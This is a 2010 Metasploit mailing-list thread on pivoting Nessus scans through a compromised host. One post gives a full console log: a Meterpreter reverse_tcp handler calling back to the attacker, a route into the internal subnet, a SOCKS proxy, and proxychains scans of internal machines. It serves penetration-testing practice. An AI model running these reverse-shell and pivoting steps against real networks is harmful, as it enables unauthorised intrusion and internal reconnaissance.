Metasploit mailing list archives
Re: nessus scanning through a metasploit tunnel
From: Robin Wood <robin () digininja org>
Date: Thu, 21 Oct 2010 10:58:48 +0100
On 19 October 2010 21:32, <egypt () metasploit com> wrote:
You can use the new auxiliary/server/socks4a module to do the same thing without having to upload an ssh server. egypt
I've just had a try with the socks proxy and had partial success. I can get Nessus to scan the machine I've compromised but nothing else on the network. This is my setup, should this work? The machines I've got are: 10.1.1.5 - compromised machine 10.1.1.2 - other machine on that subnet I want to scan 192.168.0.2 - attacking machine First setup the meterpreter connection msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lport 31337 lport => 31337 msf exploit(handler) > set lhost 192.168.0.2 lhost => 192.168.0.2 msf exploit(handler) > exploit -j [*] Exploit running as background job. msf exploit(handler) > [*] Started reverse handler on 192.168.0.2:31337 [*] Starting the payload handler... [*] Sending stage (749056 bytes) to 192.168.0.80 [*] Meterpreter session 1 opened (192.168.0.2:31337 -> 192.168.0.80:16218) at Thu Oct 21 10:25:49 +0100 2010 Add the route msf exploit(handler) > route add 10.1.1.0 255.255.255.0 1 Start the SOCKS proxy msf exploit(handler) > use auxiliary/server/socks4a msf auxiliary(socks4a) > run [*] Auxiliary module execution completed msf auxiliary(socks4a) > [*] Starting the socks4a proxy server Check the proxy is working with the proxychains config pointing at port 1080 # proxychains nc 10.1.1.2 445 ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:1080-<><>-10.1.1.2:445-<><>-OK abc Now start Nessus proxychains ./nessus-service -D I've had various things happen here. I managed to start scaning 10.1.1.5 (the compromised machine) once or twice but not every time, it hasn't yet completed, it usually dies after detecting some open ports. I've never managed to scan 10.1.1.2. If I ask it to scan both the the metasploit session locks up and I have to kill it with a ctrl-c. The netcat connection that used to work also stops working at this point. It seems like the socks4a module is getting overloaded and locking up with the amount of traffic that Nessus is trying to send through it. Does that sound likely? Robin
On Tue, Oct 19, 2010 at 1:43 PM, Robin Wood <robin () digininja org> wrote:On 19 October 2010 18:06, Zate Berg <zate75 () gmail com> wrote:To add a bit more to that, Nessus doesnt support scanning through SOCK proxies. You could look at this for inspiration if you decide that sounds like a challenge ;) http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.htmlI've seen those ideas before but I figured that if I could get it through directly then it would avoid having to install anything on the target machine. Having to get an ssh server on there doesn't really appeal.Zate On Tue, Oct 19, 2010 at 12:11 PM, Zate Berg <zate75 () gmail com> wrote:Not something that I think can be done effectively right now. Pro might open up some options to allow this but I haven't experimented enough. Zate On Tue, Oct 19, 2010 at 11:41 AM, Robin Wood <robin () digininja org> wrote:I've been playing with running Nessus scans through Metasploit and got it working fine but I then tried to run it through a route set up through a Meterpreter tunnel but it didn't work. I assume that this is because all Metasploit is doing is just accessing Nessus through its API and it isn't actually integrating with Nessus. Is there any way now we have the Nessus integration to get it to scan through the a Meterpreter tunnel? I know that it can be done through an SSH tunnel being installed on the target machine but it would be nice to be able to run it directly through Metasploit routing. Robin _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- nessus scanning through a metasploit tunnel Robin Wood (Oct 19)
- Re: nessus scanning through a metasploit tunnel Zate Berg (Oct 19)
- Re: nessus scanning through a metasploit tunnel Zate Berg (Oct 19)
- Re: nessus scanning through a metasploit tunnel Robin Wood (Oct 19)
- Re: nessus scanning through a metasploit tunnel egypt (Oct 19)
- Re: nessus scanning through a metasploit tunnel Terrence (Oct 19)
- Re: nessus scanning through a metasploit tunnel HD Moore (Oct 19)
- Re: nessus scanning through a metasploit tunnel Robin Wood (Oct 21)
- Re: nessus scanning through a metasploit tunnel HD Moore (Oct 21)
- Re: nessus scanning through a metasploit tunnel Zate Berg (Oct 19)
- Re: nessus scanning through a metasploit tunnel Zate Berg (Oct 19)
- <Possible follow-ups>
- Re: nessus scanning through a metasploit tunnel Vlatko Kosturjak (Oct 21)
- Re: nessus scanning through a metasploit tunnel Oliver Kleinecke (Oct 21)
- Re: nessus scanning through a metasploit tunnel Robin Wood (Oct 21)
- Re: nessus scanning through a metasploit tunnel Oliver Kleinecke (Oct 21)